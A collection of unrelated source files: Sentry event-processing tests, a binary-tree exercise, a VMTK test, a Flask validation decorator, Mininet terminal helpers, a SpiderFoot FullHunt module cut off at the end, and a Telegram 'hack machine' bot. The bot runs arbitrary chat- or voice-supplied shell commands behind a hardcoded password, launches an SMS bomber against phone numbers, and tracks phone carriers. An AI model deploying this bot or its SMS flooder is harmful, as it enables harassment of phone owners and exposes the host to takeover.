'the message', 'platform': 'the_platform', 'search_message': 'the search message', } data = { 'received': int(calendar.timegm(now.timetuple())), 'message': 'the short message', } output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_common(output, event, data) assert output['search_message'] == 'the search message' assert output['message'] == 'the short message' def test_v1_delete_groups_skipped(self): assert enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((1, 'delete_groups', {})) is None def test_v1_merge_skipped(self): assert enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((1, 'merge', {})) is None def test_v1_unmerge_skipped(self): assert enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((1, 'unmerge', {})) is None def test_v2_invalid_type(self): with pytest.raises(InvalidMessageType): assert enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_message((2, '__invalid__', {})) == 1 def test_v2_start_delete_groups(self): project_id = 1 message = (2, 'start_delete_groups', {'project_id': project_id}) processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)], ) def test_v2_end_delete_groups(self): project_id = 1 message = (2, 'end_delete_groups', {'project_id': project_id}) processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)], ) def test_v2_start_merge(self): project_id = 1 message = (2, 'start_merge', {'project_id': project_id}) processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)]) def test_v2_end_merge(self): project_id = 1 message = (2, 'end_merge', {'project_id': project_id}) processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)], ) def test_v2_start_unmerge(self): project_id = 1 message = (2, 'start_unmerge', {'project_id': project_id}) processor = 
enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)], ) def test_v2_end_unmerge(self): project_id = 1 message = (2, 'end_unmerge', {'project_id': project_id}) processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)], ) def test_v2_start_delete_tag(self): project_id = 1 message = (2, 'start_delete_tag', {'project_id': project_id}) processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)], ) def test_v2_end_delete_tag(self): project_id = 1 message = (2, 'end_delete_tag', {'project_id': project_id}) processor = enforce_table_writer(self.dataset).get_stream_loader().get_processor() assert processor.process_message(message) == \ ProcessedMessage( action=ProcessorAction.REPLACE, data=[(str(project_id), message)], ) def test_extract_sdk(self): sdk = { 'integrations': ['logback'], 'name': 'sentry-java', 'version': '1.6.1-d1e3a' } output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_sdk(output, sdk) assert output == { 'sdk_name': u'sentry-java', 'sdk_version': u'1.6.1-d1e3a', 'sdk_integrations': [u'logback'], } def test_extract_tags(self): orig_tags = { 'sentry:user': 'the_user', 'level': 'the_level', 'logger': 'the_logger', 'server_name': 'the_servername', 'transaction': 'the_transaction', 'environment': 'the_enviroment', 'sentry:release': 'the_release', 'sentry:dist': 'the_dist', 'site': 'the_site', 'url': 'the_url', 'extra_tag': 'extra_value', 'null_tag': None, } tags = orig_tags.copy() output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_promoted_tags(output, tags) assert output == { 'sentry:dist': 'the_dist', 'environment': u'the_enviroment', 'level': u'the_level', 'logger': u'the_logger', 'sentry:release': 'the_release', 'server_name': u'the_servername', 'site': u'the_site', 'transaction': u'the_transaction', 'url': u'the_url', 'sentry:user': u'the_user', } assert tags == orig_tags extra_output = {} extract_extra_tags(extra_output, tags) valid_items = [(k, v) for k, v in sorted(orig_tags.items()) if v] assert extra_output == { 'tags.key': [k for k, v in valid_items], 'tags.value': [v for k, v in valid_items] } def test_extract_tags_empty_string(self): # verify our text field extraction doesn't coerce '' to None tags = { 'environment': '', } output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_promoted_tags(output, tags) assert output['environment'] == u'' def test_extract_contexts(self): contexts = { 'app': { 'device_app_hash': 'the_app_device_uuid', }, 'os': { 'name': 'the_os_name', 'version': 'the_os_version', 'rooted': True, 'build': 'the_os_build', 'kernel_version': 'the_os_kernel_version', }, 'runtime': { 'name': 'the_runtime_name', 'version': 'the_runtime_version', }, 'browser': { 'name': 'the_browser_name', 'version': 'the_browser_version', }, 'device': { 'model': 'the_device_model', 'family': 'the_device_family', 'name': 'the_device_name', 'brand': 'the_device_brand', 'locale': 'the_device_locale', 'uuid': 'the_device_uuid', 'model_id': 'the_device_model_id', 'arch': 'the_device_arch', 'battery_level': 30, 
'orientation': 'the_device_orientation', 'simulator': False, 'online': True, 'charging': True, }, 'extra': { 'type': 'extra', # unnecessary 'null': None, 'int': 0, 'float': 1.3, 'list': [1, 2, 3], 'dict': {'key': 'value'}, 'str': 'string', } } orig_tags = { 'app.device': 'the_app_device_uuid', 'os': 'the_os_name the_os_version', 'os.name': 'the_os_name', 'os.rooted': True, 'runtime': 'the_runtime_name the_runtime_version', 'runtime.name': 'the_runtime_name', 'browser': 'the_browser_name the_browser_version', 'browser.name': 'the_browser_name', 'device': 'the_device_model', 'device.family': 'the_device_family', 'extra_tag': 'extra_value', } tags = orig_tags.copy() output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_promoted_contexts(output, contexts, tags) assert output == { 'app_device': u'the_app_device_uuid', 'browser': u'the_browser_name the_browser_version', 'browser_name': u'the_browser_name', 'device': u'the_device_model', 'device_arch': u'the_device_arch', 'device_battery_level': 30.0, 'device_brand': u'the_device_brand', 'device_charging': True, 'device_family': u'the_device_family', 'device_locale': u'the_device_locale', 'device_model_id': u'the_device_model_id', 'device_name': u'the_device_name', 'device_online': True, 'device_orientation': u'the_device_orientation', 'device_simulator': False, 'device_uuid': u'the_device_uuid', 'os': u'the_os_name the_os_version', 'os_build': u'the_os_build', 'os_kernel_version': u'the_os_kernel_version', 'os_name': u'the_os_name', 'os_rooted': True, 'runtime': u'the_runtime_name the_runtime_version', 'runtime_name': u'the_runtime_name', } assert contexts == { 'app': {}, 'browser': {}, 'device': {}, 'extra': { 'dict': {'key': 'value'}, 'float': 1.3, 'int': 0, 'list': [1, 2, 3], 'null': None, 'type': 'extra', 'str': 'string', }, 'os': {}, 'runtime': {}, } assert tags == orig_tags extra_output = {} extract_extra_contexts(extra_output, contexts) assert extra_output == { 'contexts.key': ['extra.int', 'extra.float', 'extra.str'], 'contexts.value': [u'0', u'1.3', u'string'], } def test_extract_user(self): user = { 'id': 'user_id', 'email': 'user_email', 'username': 'user_username', 'ip_address': '127.0.0.2', } output = {} extract_user(output, user) assert output == {'email': u'user_email', 'ip_address': u'127.0.0.2', 'user_id': u'user_id', 'username': u'user_username'} def test_extract_geo(self): geo = { 'country_code': 'US', 'city': 'San Francisco', 'region': 'CA', } output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_geo(output, geo) assert output == { 'geo_country_code': 'US', 'geo_city': 'San Francisco', 'geo_region': 'CA', } def test_extract_http(self): http = { 'method': 'GET', 'headers': [ ['Referer', 'https://sentry.io'], ['Host', 'https://google.com'], ] } output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_http(output, http) assert output == {'http_method': u'GET', 'http_referer': u'https://sentry.io'} def test_extract_stacktraces(self): stacks = [ {'module': 'java.lang', 'mechanism': { 'type': 'promise', 'description': 'globally unhandled promise rejection', 'help_link': 'http://example.com', 'handled': False, 'data': { 'polyfill': 'Bluebird' }, 'meta': { 'errno': { 'number': 123112, 'name': '' } } }, 'stacktrace': { 'frames': [ {'abs_path': 'Thread.java', 'filename': 'Thread.java', 'function': 'run', 'in_app': False, 'lineno': 748, 'module': 'java.lang.Thread'}, {'abs_path': 'ExecJavaMojo.java', 'filename': 
'ExecJavaMojo.java', 'function': 'run', 'in_app': False, 'lineno': 293, 'module': 'org.codehaus.mojo.exec.ExecJavaMojo$1'}, {'abs_path': 'Method.java', 'filename': 'Method.java', 'function': 'invoke', 'in_app': False, 'colno': 19, 'lineno': 498, 'module': 'java.lang.reflect.Method'}, {'abs_path': 'DelegatingMethodAccessorImpl.java', 'filename': 'DelegatingMethodAccessorImpl.java', 'function': 'invoke', 'in_app': False, 'package': 'foo.bar', 'lineno': 43, 'module': 'sun.reflect.DelegatingMethodAccessorImpl'}, {'abs_path': 'NativeMethodAccessorImpl.java', 'filename': 'NativeMethodAccessorImpl.java', 'function': 'invoke', 'in_app': False, 'lineno': 62, 'module': 'sun.reflect.NativeMethodAccessorImpl'}, {'abs_path': 'NativeMethodAccessorImpl.java', 'filename': 'NativeMethodAccessorImpl.java', 'function': 'invoke0', 'in_app': False, 'module': 'sun.reflect.NativeMethodAccessorImpl'}, {'abs_path': 'Application.java', 'filename': 'Application.java', 'function': 'main', 'in_app': True, 'lineno': 17, 'module': 'io.sentry.example.Application'}]}, 'type': 'ArithmeticException', 'value': '/ by zero'}] output = {} enforce_table_writer(self.dataset).get_stream_loader().get_processor().extract_stacktraces(output, stacks) assert output == { 'exception_frames.abs_path': [u'Thread.java', u'ExecJavaMojo.java', u'Method.java', u'DelegatingMethodAccessorImpl.java', u'NativeMethodAccessorImpl.java', u'NativeMethodAccessorImpl.java', u'Application.java'], 'exception_frames.colno': [None, None, 19, None, None, None, None], 'exception_frames.filename': [u'Thread.java', u'ExecJavaMojo.java', u'Method.java', u'DelegatingMethodAccessorImpl.java', u'NativeMethodAccessorImpl.java', u'NativeMethodAccessorImpl.java', u'Application.java'], 'exception_frames.function': [u'run', u'run', u'invoke', u'invoke', u'invoke', u'invoke0', u'main'], 'exception_frames.in_app': [False, False, False, False, False, False, True], 'exception_frames.lineno': [748, 293, 498, 43, 62, None, 17], 'exception_frames.module': [u'java.lang.Thread', u'org.codehaus.mojo.exec.ExecJavaMojo$1', u'java.lang.reflect.Method', u'sun.reflect.DelegatingMethodAccessorImpl', u'sun.reflect.NativeMethodAccessorImpl', u'sun.reflect.NativeMethodAccessorImpl', u'io.sentry.example.Application'], 'exception_frames.package': [None, None, None, u'foo.bar', None, None, None], 'exception_frames.stack_level': [0, 0, 0, 0, 0, 0, 0], 'exception_stacks.type': [u'ArithmeticException'], 'exception_stacks.value': [u'/ by zero'], 'exception_stacks.mechanism_handled': [False], 'exception_stacks.mechanism_type': [u'promise'], } def test_null_values_dont_throw(self): event = { 'event_id': 'bce76c2473324fa387b33564eacf34a0', 'group_id': 1, 'primary_hash': 'a' * 32, 'project_id': 70156, 'message': None, 'platform': None, 'data': { 'culprit': None, 'errors': None, 'extra': None, 'fingerprint': None, 'http': None, 'id': 'bce76c2473324fa387b33564eacf34a0', 'message': None, 'metadata': None, 'platform': None, 'project': 70156, 'release': None, 'dist': None, 'sdk': None, 'sentry.interfaces.Exception': { 'exc_omitted': None, 'values': None }, 'sentry.interfaces.Message': None, 'tags': None, 'time_spent': None, 'type': None, 'version': None } } timestamp = datetime.utcnow() event['datetime'] = (timestamp - timedelta(seconds=2)).strftime("%Y-%m-%dT%H:%M:%S.%fZ") event['data']['received'] = int(calendar.timegm((timestamp - timedelta(seconds=1)).timetuple())) enforce_table_writer(self.dataset).get_stream_loader().get_processor().process_insert(event)
the-stack_106_24266
import sys


class Node:
    def __init__(self, data):
        self.right = self.left = None
        self.data = data


class Solution:
    def insert(self, root, data):
        if root == None:
            return Node(data)
        else:
            if data <= root.data:
                cur = self.insert(root.left, data)
                root.left = cur
            else:
                cur = self.insert(root.right, data)
                root.right = cur
        return root

    def levelOrder(self, root):
        # Write your code here
        nodes_to_search = list()
        nodes_to_search.append(root)
        nodes_searched = ''
        while len(nodes_to_search) > 0:
            node = nodes_to_search.pop(0)
            if node.left:
                nodes_to_search.append(node.left)
            if node.right:
                nodes_to_search.append(node.right)
            nodes_searched += str(node.data) + ' '
        print(nodes_searched)


T = int(input())
myTree = Solution()
root = None
for i in range(T):
    data = int(input())
    root = myTree.insert(root, data)
myTree.levelOrder(root)
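For reference, a small driver for the `Solution` class above with made-up input (a sketch, not part of the original submission): inserting 3, 5, 4, 7, 2, 1 builds a BST whose breadth-first traversal is 3 2 5 1 4 7.

# Hypothetical run of the level-order traversal without reading from stdin.
values = [3, 5, 4, 7, 2, 1]
tree = Solution()
root = None
for v in values:
    root = tree.insert(root, v)
tree.levelOrder(root)   # prints: 3 2 5 1 4 7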
the-stack_106_24269
## Program: VMTK
## Language: Python
## Date: May 2, 2018
## Version: 1.4

## Copyright (c) Richard Izzo, Luca Antiga, All rights reserved.
## See LICENSE file for details.

## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.

## Note: this code was contributed by
## Richard Izzo (Github @rlizzo)
## University at Buffalo

import pytest
import vmtk.vmtkcenterlineimage as centerlineimage
import sys


@pytest.fixture(scope='module')
def per_system_compare_image_name():
    name = __name__ + '_test_default_parameters_'
    if sys.platform in ['win32', 'win64', 'cygwin']:
        name = name + 'windows.vti'
    elif sys.platform == 'darwin':
        name = name + 'mac.vti'
    else:
        name = name + 'linux.vti'
    return name


def test_default_parameters(aorta_surface, compare_images, per_system_compare_image_name):
    centImage = centerlineimage.vmtkCenterlineImage()
    centImage.Surface = aorta_surface
    centImage.Execute()

    assert compare_images(centImage.Image, per_system_compare_image_name) == True
the-stack_106_24270
# -*- coding: utf-8 -*-
"""
This file is covered by the LICENSING file in the root of this project.
"""

import sys

sys.path.append("..")

from functools import wraps
from werkzeug.exceptions import BadRequest, InternalServerError
from dateutil import parser
from flask_restful import Resource
from flask import request
import validictory

from hackathon.views.api_schema import schemas
from hackathon import RequiredFeature, Context

__all__ = ["Resource", "HackathonResource"]

log = RequiredFeature("log")


def get_input_schema(class_name, method_name):
    return __get_schema(class_name, method_name, "input")


def get_output_schema(class_name, method_name):
    return __get_schema(class_name, method_name, "output")


def __get_schema(class_name, method_name, t):
    if class_name in schemas:
        cls = schemas[class_name]
        if method_name in cls:
            return cls[method_name].get(t)
    return None


def validate_date(validator, fieldname, value, format_option):
    if format_option == "hack_date":
        try:
            parser.parse(value)
        except Exception as e:
            raise validictory.FieldValidationError(
                "Could not parse date from string %s, reason: %s" % (value, e),
                fieldname, value)
    else:
        raise validictory.FieldValidationError("Invalid format option for \
            'validate_uuid': %(format)s" % format_option, fieldname, value)


def validate(func):
    """A decorator for RestFul APIs that enables parameter validation"""

    @wraps(func)
    def wrapper(*args, **kwargs):
        class_name = func.__self__.__class__.__name__
        method_name = func.__name__.lower()
        if hasattr(func, "original"):
            method_name = func.original

        input_schema = get_input_schema(class_name, method_name)
        output_schema = get_output_schema(class_name, method_name)

        if input_schema:
            if method_name in ["post", "put"] and not request.path == "/api/user/file":
                data = request.get_json(force=True)
            else:
                data = request.args
            try:
                formatdict = {
                    "hack_date": validate_date
                }
                validictory.validate(data, input_schema, format_validators=formatdict, fail_fast=False)
                log.debug("input validated for %s.%s" % (class_name, method_name))
            except validictory.MultipleValidationError as me:
                log.debug("input validation of '%s.%s' failed: %s" % (class_name, method_name, repr(me.errors)))
                raise BadRequest(repr(me.errors))

        output_data = func(*args, **kwargs)

        if output_schema:
            # if it's kind of `error` defined in hackathon_response.py, skip the validation
            if isinstance(output_data, dict) and "error" in output_data:
                return output_data
            try:
                validictory.validate(output_data, output_schema, fail_fast=False)
                log.debug("output validated for %s.%s" % (class_name, method_name))
            except validictory.MultipleValidationError as me:
                log.debug("output validation of '%s.%s' failed: %s" % (class_name, method_name, repr(me.errors)))
                raise InternalServerError(repr(me.errors))

        code = "200"
        if output_data is not None and isinstance(output_data, dict) and "error" in output_data:
            code = output_data["error"]["code"]
        log.debug("API call %s.%s -- %s %d" % (class_name, method_name, code, len(str(output_data))))
        return output_data

    return wrapper


class HackathonResource(Resource):
    """Inheritance of Resource which provides custom input/output validation"""
    method_decorators = [validate]

    def context(self):
        """Convert input to Context

        By default, convert json body to Context for put/post request, convert args for get/delete request

        :rtype: Context
        :return Context object from request body or query
        """
        caller = sys._getframe().f_back.f_code.co_name.lower()
        if caller in ["post", "put"] and not request.path == "/api/user/file":
            return Context.from_object(request.get_json(force=True))
        else:
            return Context.from_object(request.args)
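To show how the decorator above resolves schemas (a hedged sketch only; the real definitions live in `hackathon.views.api_schema`, and the resource name and fields here are invented), an entry keyed by resource class name and lower-cased HTTP method might look like this:

# Hypothetical schema entry and resource, for illustration only.
schemas = {
    "TemplateResource": {                     # keyed by the resource class name
        "get": {                              # lower-cased HTTP method
            "input": {                        # checked against request.args
                "type": "object",
                "properties": {"id": {"type": "string"}},
            },
            "output": {                       # checked against the return value
                "type": "object",
                "properties": {"name": {"type": "string"}},
            },
        }
    }
}


class TemplateResource(HackathonResource):
    def get(self):
        ctx = self.context()                  # query args wrapped in a Context
        return {"name": "example-template"}   # validated by the output schema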
the-stack_106_24271
import telegram from telegram.ext import Updater,CommandHandler,MessageHandler, Filters import logging import subprocess as sp import requests import json import threading from bomber import kill import shodan import speech_recognition as sr from pydub import AudioSegment import re enabled_users=[] ippsec_list=[] # api required bot=telegram.Bot("<token>") updater = Updater(token='<token>') dispatcher = updater.dispatcher logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',level=logging.INFO) SHODAN_API_KEY = "<token>" api = shodan.Shodan(SHODAN_API_KEY) def banner(): c="==========================" c+="\nWelcome To personal Hack Machine" c+="\n To start Login:- /verify <password>" c+="\n========================" return (c) def sender(update,text): bot.send_message(chat_id=update.message.chat_id, text=text) def banned(update): bot.send_message(chat_id=update.message.chat_id,text="Login First !!") def start(bot, update): bot.send_message(chat_id=update.message.chat_id, text=banner()) start_handler = CommandHandler('start', start) dispatcher.add_handler(start_handler) def verify(bot,update,args): if args: if args[0]=="haha@123": sender(update,"Successfully logged in") enabled_users.append(update.message.from_user.id) else: banned(update) verify_handler = CommandHandler('verify', verify,pass_args=True) dispatcher.add_handler(verify_handler) def echo(bot, update): sender(update,"Use /help For more :)") echo_handler = MessageHandler(Filters.text, echo) dispatcher.add_handler(echo_handler) def voice_handler(bot, update): r = sr.Recognizer() file = bot.getFile(update.message.voice.file_id) sender(update,"Processing the command") file.download('voice.ogg') ogg_version = AudioSegment.from_ogg("voice.ogg") ogg_version.export("voice.wav", format="wav") harvard = sr.AudioFile('voice.wav') with harvard as source: audio = r.record(source) analyser(bot,update,r.recognize_google(audio)) echoaudio_handler = MessageHandler(Filters.voice, voice_handler) dispatcher.add_handler(echoaudio_handler) def exit(bot, update): sender(update,"Logged out Successfully") enabled_users.remove(update.message.from_user.id) exit_handler = CommandHandler('exit', exit) dispatcher.add_handler(exit_handler) def cmd2(bot,update,args): if update.message.from_user.id in enabled_users: if args: output = sp.getoutput(args) sender(update,output) else: sender(update,"Enter a command dumbass !!") else: banned(update) def ippsec(bot,update,args): if update.message.from_user.id in enabled_users: target=args[0] temp=['empty life'] global ippsec_list if ippsec_list: count=0 sender(update,"Keyword: {}".format(target)) for i in ippsec_list: count+=1 i=i.lower() if i.find(target)>=0: location=count-1 flag=0 while flag==0: s=ippsec_list[location] if s.find("HackTheBox")==0: if ippsec_list[location+1] in temp: flag=1 else: temp.append(ippsec_list[location+1]) output="Machine: {}\nLink: {}".format(s,ippsec_list[location+1]) sender(update,output) flag=1 else: location=location-1 else: url="https://gist.githubusercontent.com/sminez/571bd7bafb1b88630b85c85a0cd66e3a/raw/68fe21504be4654b739a577a482d91587524f683/ippsec-details.txt" r=requests.get(url) ippsec_list=r.text.split('\n') ippsec(bot,update,args) else: banned(update) def ippsec_start(bot,update,args): commands="" lists=[] for i in range(len(args)): commands+=args[i] commands+=" " commands.split() lists.append(commands) print(lists) ippsec(bot,update,lists) help_handler = CommandHandler('youtube', ippsec_start,pass_args=True) dispatcher.add_handler(help_handler) def 
analyser(bot,update,commands): commands=commands.lower() if re.match("cmd",commands): commands=commands.replace("cmd","") cmd2(bot,update,commands) elif re.match("shodan",commands): commands=commands.replace("shodan","") text = commands.split(' ') text.remove('') shodansearch(bot,update,text) elif re.match("sms",commands): commands=commands.replace("sms","").replace(" ","") text = commands.split(' ') sender(update,"Target: {}".format(text[0])) bomb(bot,update,text) elif re.match("verify",commands): commands=commands.replace("verify","").replace(" ","") text = commands.split(' ') sender(update,"Password Entered: {}".format(text[0])) verify(bot,update,text) elif re.match("help",commands): help(bot,update) elif re.match("exit",commands): exit(bot,update) elif re.match("youtube",commands): text=[] commands=commands.replace("youtube","") text.append(commands) ippsec(bot,update,text) else: sender(update,"Process failed try again :(\nraw output: {}".format(commands)) def help(bot,update): sender(update,"- /verify <password>\n- /cmd <command>\n- /exit\n- /track <phone-number-with-country-prefix>\n- /bomber <indian-phone-number-without-country-code\n- /shodan <For instructions>\n- /voice <For instructions>\n- /youtube <keyword-to-search-in-ippsec-videos>") help_handler = CommandHandler('help', help) dispatcher.add_handler(help_handler) def voice_help(bot,update): sender(update,"[Below commands should be spoken clearly and you can only use voice command and control from personal chat with bot and by replying to bot in group chats]\n\n[To start chat with bot click here:- \n\nhttps://telegram.me/callmedaddbot ]\n- help\n- verify <password>\n- sms <number to bomb>\n- shodan find/ip <ip/http/ftp/service>\n- cmd <command-to-execute>\n- youtube <keyword-to-search-in-ippsec-videos>\n- exit ") voicehelp_handler = CommandHandler('voice', voice_help) dispatcher.add_handler(voicehelp_handler) def cmd(bot,update,args): if update.message.from_user.id in enabled_users: if args: command="" for i in range(len(args)): command+=args[i] command+=" " output = sp.getoutput(command) sender(update,output) else: sender(update,"Enter a command dumbass !!") else: banned(update) caps_handler = CommandHandler('cmd', cmd, pass_args=True) dispatcher.add_handler(caps_handler) def callsearch(bot,update,args): if update.message.from_user.id in enabled_users: if args: args=args[0].replace("+","") r=requests.get("http://apilayer.net/api/validate?access_key=<token>&number={}&country_code=&format=1".format(args)) data=json.loads(r.text) sendback="Phone Number:-{}\nCountry Prefix:-{}\nLocation:-{}\nCountry:-{}\nCarrier:-{}".format(data['international_format'],data['country_prefix'],data['location'],data['country_name'],data['carrier']) sender(update,sendback) else: banned(update) call_handler = CommandHandler('track', callsearch, pass_args=True) dispatcher.add_handler(call_handler) def bomb(bot,update,args): if update.message.from_user.id in enabled_users: if args: num=args[0].replace("+91","") threading.Thread(target=kill,args=(num,)).start() sender(update,"Hiroshima is Done for, sire :)") else: sender(update,"/bomber <indian-phone-number-without-country-code") else: banned(update) bomb_handler = CommandHandler('bomber', bomb, pass_args=True) dispatcher.add_handler(bomb_handler) def shodansearch(bot,update,args): if update.message.from_user.id in enabled_users: if args: if len(args)<=2: if args[0]=="ip": try: a=api.host('{}'.format(args[1])) ports=str(a['ports']).replace("[","").replace("]","") a="ip:{}\nports 
opened:{}\nCity:{}\ncountry code:{}\nISP:{}\nlongitude:{}\nlatitude:{}".format(a['ip_str'],ports,a['data'][0]['location']['city'],a['data'][0]['location']['country_code3'],a['isp'],a['longitude'],a['latitude']) sender(update,a) except: sender(update,"No information available on this ip") if args[0]=="find": query=str(args[1]) a=api.search(query,page=1,limit=3) for i in a['matches']: s="\norganistaion {}\nISP: {}\nIP: {}\n".format(i['org'],i['isp'],i['ip_str']) sender(update,s) elif len(args)>2: if args[0]=="find" and args[1]=="limit": limits=int(args[2]) if limits<=10: query=str(args[3]) a=api.search(query,page=1,limit=limits) for i in a['matches']: s="\norganistaion {}\nISP: {}\nIP: {}\n".format(i['org'],i['isp'],i['ip_str']) sender(update,s) else: sender(update,"Limit Crossed") else: a="- /shodan ip <ipaddress>\n- /shodan find <http/ssh/ftp/port/city/software> [MAX LIMIT 3]\n- /shodan find limit <enter b/w 1 to 10> <http/ssh/ftp/port/city/software> [MAX LIMIT 10]" sender(update,a) else: banned(update) shodan_handler = CommandHandler('shodan', shodansearch, pass_args=True) dispatcher.add_handler(shodan_handler) updater.start_polling()
the-stack_106_24272
""" Terminal creation and cleanup. Utility functions to run a terminal (connected via socat(1)) on each host. Requires socat(1) and xterm(1). Optionally uses gnome-terminal. """ from os import environ from mininet.log import error from mininet.util import quietRun, errRun def tunnelX11( node, display=None): """Create an X11 tunnel from node:6000 to the root host display: display on root host (optional) returns: node $DISPLAY, Popen object for tunnel""" if display is None and 'DISPLAY' in environ: display = environ[ 'DISPLAY' ] if display is None: error( "Error: Cannot connect to display\n" ) return None, None host, screen = display.split( ':' ) # Unix sockets should work if not host or host == 'unix': # GDM3 doesn't put credentials in .Xauthority, # so allow root to just connect quietRun( 'xhost +si:localuser:root' ) return display, None else: # Create a tunnel for the TCP connection port = 6000 + int( float( screen ) ) connection = r'TCP\:%s\:%s' % ( host, port ) cmd = [ "socat", "TCP-LISTEN:%d,fork,reuseaddr" % port, "EXEC:'mnexec -a 1 socat STDIO %s'" % connection ] return 'localhost:' + screen, node.popen( cmd ) def makeTerm( node, title='Node', term='xterm', display=None, cmd='bash'): """Create an X11 tunnel to the node and start up a terminal. node: Node object title: base title term: 'xterm' or 'gterm' returns: two Popen objects, tunnel and terminal""" title = '"%s: %s"' % ( title, node.name ) if not node.inNamespace: title += ' (root)' cmds = { 'xterm': [ 'xterm', '-title', title, '-display' ], 'gterm': [ 'gnome-terminal', '--title', title, '--display' ] } if term not in cmds: error( 'invalid terminal type: %s' % term ) return display, tunnel = tunnelX11( node, display ) if display is None: return [] term = node.popen( cmds[ term ] + [ display, '-e', 'env TERM=ansi %s' % cmd ] ) return [ tunnel, term ] if tunnel else [ term ] def runX11( node, cmd ): "Run an X11 client on a node" _display, tunnel = tunnelX11( node ) if _display is None: return [] popen = node.popen( cmd ) return [ tunnel, popen ] def cleanUpScreens(): "Remove moldy socat X11 tunnels." errRun( "pkill -9 -f mnexec.*socat" ) def makeTerms( nodes, title='Node', term='xterm' ): """Create terminals. nodes: list of Node objects title: base title for each returns: list of created tunnel/terminal processes""" terms = [] for node in nodes: terms += makeTerm( node, title, term ) return terms
the-stack_106_24273
# -*- coding: utf-8 -*- # ------------------------------------------------------------------------------- # Name: sfp_fullhunt # Purpose: Identify domain attack surface using FullHunt API. # # Author: <[email protected]> # # Created: 2021-10-26 # Copyright: (c) bcoles 2021 # Licence: MIT # ------------------------------------------------------------------------------- import json from spiderfoot import SpiderFootEvent, SpiderFootPlugin class sfp_fullhunt(SpiderFootPlugin): meta = { 'name': "FullHunt", 'summary': "Identify domain attack surface using FullHunt API.", 'flags': ['apikey'], 'useCases': ["Passive", "Footprint", "Investigate"], 'categories': ["Search Engines"], 'dataSource': { 'website': "https://fullhunt.io/", 'model': "FREE_AUTH_LIMITED", 'references': [ "https://api-docs.fullhunt.io/", ], 'apiKeyInstructions': [ "Visit https://fullhunt.io/", "Register a free account", "Navigate to https://fullhunt.io/user/settings/", "Your API key is listed under 'API Access'" ], 'favIcon': "https://fullhunt.io/static/theme/images/logo/favicon.ico", 'logo': "https://fullhunt.io/static/theme/images/logo/Icon.png", 'description': "Discover, monitor, and secure your attack surface. " "FullHunt delivers the best platform in the market for attack surface security." } } opts = { "api_key": "", } optdescs = { "api_key": "FullHunt API key.", } results = None errorState = False def setup(self, sfc, userOpts=dict()): self.sf = sfc self.errorState = False self.results = self.tempStorage() for opt in list(userOpts.keys()): self.opts[opt] = userOpts[opt] def watchedEvents(self): return [ "DOMAIN_NAME", ] def producedEvents(self): return [ "INTERNET_NAME", "INTERNET_NAME_UNRESOLVED", "AFFILIATE_INTERNET_NAME", "AFFILIATE_INTERNET_NAME_UNRESOLVED", "TCP_PORT_OPEN", "PROVIDER_DNS", "PROVIDER_MAIL", ] def queryDomainDetails(self, qry): """Search for hosts on a domain. Args: qry (str): domain name Returns: dict: search results """ headers = { 'X-API-KEY': self.opts['api_key'] } res = self.sf.fetchUrl( f"https://fullhunt.io/api/v1/domain/{qry}/details", timeout=30, headers=headers, useragent=self.opts['_useragent'] ) return self.parseApiResponse(res) def parseApiResponse(self, res: dict): if not res: self.error("No response from FullHunt.") return None if res['code'] == "400": self.error("Bad Request -- Your request is invalid.") return None if res['code'] == "401": self.errorState = True self.error("Unauthorized -- Your API key is wrong.") return None if res['code'] == "403": self.errorState = True self.error("Forbidden -- The requested resource is forbidden.") return None if res['code'] == "404": self.error("Not Found -- The requested resource could not be found.") return None if res['code'] == "429": self.errorState = True self.error("Too Many Requests -- You are sending too many requests.") return None try: results = json.loads(res['content']) except Exception as e: self.debug(f"Error processing JSON response: {e}") return None return results.get('hosts') def handleEvent(self, event): eventName = event.eventType eventData = event.data if self.errorState: return self.debug(f"Received event, {eventName}, from {event.module}") if self.opts["api_key"] == "": self.error( f"You enabled {self.__class__.__name__} but did not set an API key!" 
